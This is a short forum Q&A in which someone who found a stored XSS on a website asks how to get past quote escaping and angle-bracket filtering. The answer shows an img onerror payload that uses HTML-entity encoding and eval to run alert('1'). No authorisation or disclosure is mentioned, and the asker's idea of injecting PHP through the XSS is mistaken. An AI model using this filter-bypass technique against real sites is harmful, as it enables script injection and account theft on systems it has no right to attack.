Exploit the xss vulnerability with php code

Question

I found a stored xss. Code lines like this;

<img class="br64 mr15" onerror="this.onerror=null;this.src=`https://www.examplesite.zcs/default.png`;" width="100" height="100" src="xss is here">

The problem is that the system inserts a \ before every quotation mark I put, deleted "<>" characters. Can I take advantage of this stored xss?

If I get over these obstacles, I'm thinking of exiting the <img> tag I'm in and starting a <?php tag.

Answer 1

Try HTML Encoding the payload I used https://onlinetexttools.com/html-encode-text to encode alert('1') which yeilded alert('1') and I simply called the eval function

<img class="br64 mr15" src='badurl.png' onerror="eval(&#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;);" width="100" height="100" src="xss is here">

As you see above, there are no quotes or <> tags (though you could use them too with HTML encode).

Here is the JS Fiddle https://jsfiddle.net/2jb90g43/